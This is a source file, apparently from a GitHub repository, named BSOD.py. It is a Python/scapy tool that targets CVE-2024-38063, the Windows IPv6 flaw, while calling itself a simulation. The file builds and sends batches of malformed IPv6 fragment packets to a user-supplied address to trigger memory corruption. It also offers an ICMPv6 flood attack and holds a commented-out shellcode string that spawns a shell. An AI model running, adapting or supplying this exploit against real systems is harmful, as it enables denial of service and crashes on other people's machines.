-
Notifications
You must be signed in to change notification settings - Fork 0
/
BSOD.py
231 lines (156 loc) · 8.16 KB
/
BSOD.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
import argparse
import subprocess
import sys
import pkg_resources
import time
import os
import logging
import shutil
import tqdm
from tqdm import tqdm
from scapy.all import *
logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(levelname)s - %(message)s')
"""shellcode = ("\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0"
"\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")"""
def install_package(package_list):
try:
subprocess.check_call(sys.executable,'-m','pip','install',package_list)
logging.info(f"Successfully installed {package_list}")
except subprocess.CalledProcessError as e :
logging.error(f"Error installing {package_list} : {str(e)}")
sys.exit(1)
###########################################################################################
def check_git_installed():
if not shutil.which("git"):
logging.error("Git not installed. Please install Git Now!!!")
sys.exit(1)
#########################################################################
def package_runing():
required_packages = ['scapy','psutil']
installered_packages = [pkg.key for pkg in pkg_resources.working_set]
for package in required_packages:
if package not in installered_packages:
logging.info(f"{package} not found. Installing...")
install_package(package)
else:
logging.info(f"{package} is already installed...")
return None
#########################################################################################3
#implement exploit packet
def get_packets_with_mac(i,mac_addr,ipv6):
frag_id = 0xdebac1e + i
first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
return [first, second, third]
def get_packet(i,ipv6,mac_addr):
if mac_addr:
return get_packets_with_mac(i,mac_addr,ipv6)
frag_id = 0xdebac1e + i
first = IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
third = IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
return [first, second, third]
def get_exploit_packet(i,ipv6):
frag_id = 0xdebac1e + i
first = IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
third = IPv6(fl=1, hlim=64+i, dst=ipv6) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
return [first, second, third]
def icmp_flood_attack(ipv6):
logging.info(f"Start ICMP flood attack on {ipv6}")
number_of_develiver = int(input("Enter the number of ICMP flood attack : "))
send(IPv6(dst=ipv6) / ICMP() / "Flood Start!",count=1)
for _ in range(number_of_develiver):
send(IPv6(dst=ipv6) / ICMP() / "Flood!!",count=1000)
send(IPv6(dst=ipv6) / ICMP() / "Flood End!",count=1)
def prompt_send_dangerous_packets(ipv6,mac_addr,ifaces):
print(f"{RED}** Warning ** Don,t forget to setup route ipv6. (ex. sudo ip -6 route add <your IPv6> dev <interface network>)after to do success. Please restart program{RESET}")
run_packet = input("Do you want to send a dangerous package? [Y/n] : ").lower()
if run_packet == 'y':
logging.info("Sending packets...")
for iface in ifaces:
sendp(final_ps,iface=iface) if mac_addr else send(final_ps,iface=iface)
elif run_packet == 'n':
logging.info(f"{ipv6} Exiting Program...")
sys.exit(1)
else:
logging.waring("Invalid input. Skipping packet sending...")
return None
def countdown_exit():
for i in range(60):
print(f"{MAGENTA} Memory corruption will be triggered in {59-i} seconds{RESET}",end='\r')
time.sleep(1)
def promt_memu_attack(ipv6,mac_addr,ifaces):
while True:
print("\n=== Select an attack ===")
print("[1] ICMP Flood Attack")
print("[2] Attack Now!!!")
print("[3] Exit...")
choice = int(input("Your select : "))
if choice == 1:
logging.info("ICMP Flood Attack")
icmp_flood_attack(ipv6)
countdown_exit()
elif choice == 2:
logging.info("Attack Now!!!")
prompt_send_dangerous_packets(ipv6,mac_addr,ifaces)
countdown_exit()
else:
break
def package_pack(ipv6,mac_addr):
global final_ps
final_ps = []
for _ in tqdm(range(num_batches),desc="Package Packageing...",ascii=False,ncols=100):
for i in range(num_tries):
final_ps += get_packet(i,ipv6,mac_addr) + get_exploit_packet(i,ipv6) + get_packet(i,ipv6,mac_addr)
def main():
global num_tries
global num_batches
global RESET
global RED
global MAGENTA
global GREEN
RESET = '\033[0m'
RED = '\033[91m'
MAGENTA = '\033[95m'
GREEN = '\033[92m'
logo = """ ██████╗ █████╗ ██████╗ ██╗ ██╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗
██╔══██╗ ██╔══██╗ ██╔══██╗ ╚██╗ ██╔╝ ██║ ██║ ██╔═══██╗ ██╔═══██╗ ██║ ██╔╝
██████╔╝ ███████║ ██████╔╝ ╚████╔╝ ███████║ ██║ ██║ ██║ ╚═╝ █████═╝
██╔══██╗ ██╔══██║ ██╔══██╗ ╚██╔╝ ██╔══██║ ██║ █ ██║ ██║ ██╔ ██╗
██████╔╝ ██║ ██║ ██████╔╝ ██║ ██║ ██║ ██║ ████║ ██║ ██╗ ██╔══██╗
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚██████╔╝ ╚═╝ ╚═╝ (CVE-2024-38063)"""
print(f"\n{logo}")
parser = argparse.ArgumentParser(description="IPv6 Vulnerablility (CVE-2024-38063) simulation by Babyh@ck")
parser.add_argument("-iface",type=str,required=True,help="Network interface(s) to use for sending packets")
parser.add_argument("-ipv6",type=str,required=True,help="Destination IPv6 address")
parser.add_argument("-mac",type=str,required=True,help="Destination MAC Address")
parser.add_argument("-tries",type=int,default=90,help="Number of trise per batch")
parser.add_argument("-batches",type=int,default=90,help="Number batches of trise")
args = parser.parse_args()
ifaces = args.iface.split(',')
ipv6 = args.ipv6
mac_addr = args.mac
num_tries = args.tries
num_batches = args.batches
if not ipv6:
logging.error("Please run program again...")
sys.exit(1)
else:
use_ipv6 = input(f"Do you want to use the provided IPv6 address {ipv6}? [Y/n] : ").lower()
if use_ipv6 == 'n':
ipv6_new = input("Please enter the new IPv6 address (Can be left blank) :")
package_pack(ipv6_new,mac_addr)
promt_memu_attack(ipv6_new,mac_addr,ifaces)
elif use_ipv6 != 'y':
logging.error("Invalid input. Exiting...")
sys.exit(1)
else:
package_pack(ipv6,mac_addr)
promt_memu_attack(ipv6,mac_addr,ifaces)
logging.info(f"{GREEN}Scanning and monitoring completed.{RESET}")
return None
if __name__ =='__main__':
package_runing()
main()